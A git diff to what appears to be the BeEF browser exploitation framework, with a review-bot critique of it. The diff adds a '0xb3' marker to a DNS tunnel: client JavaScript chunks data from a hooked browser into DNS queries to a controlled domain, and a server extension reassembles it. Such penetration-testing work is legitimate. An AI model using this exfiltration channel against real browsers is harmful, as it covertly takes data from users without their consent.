diff --git a/core/main/client/net/dns.js b/core/main/client/net/dns.js
index 02aa65ef9..106b6e698 100644
--- a/core/main/client/net/dns.js
+++ b/core/main/client/net/dns.js
@@ -71,11 +71,13 @@ beef.net.dns = {
 var segments = encodedData.chunk(max_data_segment_length);
+ var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
+ //TODO remove this
 console.log(segments.length);
 for (var seq=1; seq<=segments.length; seq++) {
- sendQuery(msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
+ sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
 }
 // callback - returns the number of queries sent
diff --git a/extensions/dns/dns.rb b/extensions/dns/dns.rb
index 8abc4c027..a8fe43651 100644
--- a/extensions/dns/dns.rb
+++ b/extensions/dns/dns.rb
@@ -140,9 +140,14 @@ module BeEF
 @lock.synchronize do
 print_debug "Received DNS request (name: #{name} type: #{format_resource(resource)})"
- # no need to parse AAAA resources when data is extruded from client
- if format_resource(resource) == 'A'
- reconstruct(name)
+ # no need to parse AAAA resources when data is extruded from client. Also we check if the FQDN starts with the 0xb3 string.
+ # this 0xb3 is convenient to clearly separate DNS requests used to extrude data from normal DNS requests than should be resolved by the DNS server.
+ if format_resource(resource) == 'A' and name.match(/^0xb3/)
+ reconstruct(name.split('0xb3').last)
+ catch (:done) do
+ transaction.fail!(:NXDomain)
+ end
+ return
 end
 catch (:done) do
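Review bot: The marker is glued to msgId with no delimiter in `sendQuery(ident + msgId + "." + ...)`, so the receiver can only strip it by matching a fixed prefix, yet the dns.rb hunk in this same commit strips it with `name.split('0xb3').last`, which discards everything up to the last occurrence of `0xb3` and truncates the message whenever msgId or a data segment happens to contain that substring (whether the encoding can produce it is not visible here). Stripping a fixed prefix on the server side, e.g. `reconstruct(name.sub(/\A0xb3/, ''))`, or emitting the marker as its own label with `ident + "." + msgId + ...` here, would make the framing unambiguous. The marker string is also duplicated literally in both files with only a comment tying them together; the comment on `var ident` should at least say the receiver depends on the exact value and position. The `//TODO remove this` debug `console.log(segments.length);` is acknowledged by the commit itself and should be dropped before merge. The enclosing function starts and ends outside the hunk.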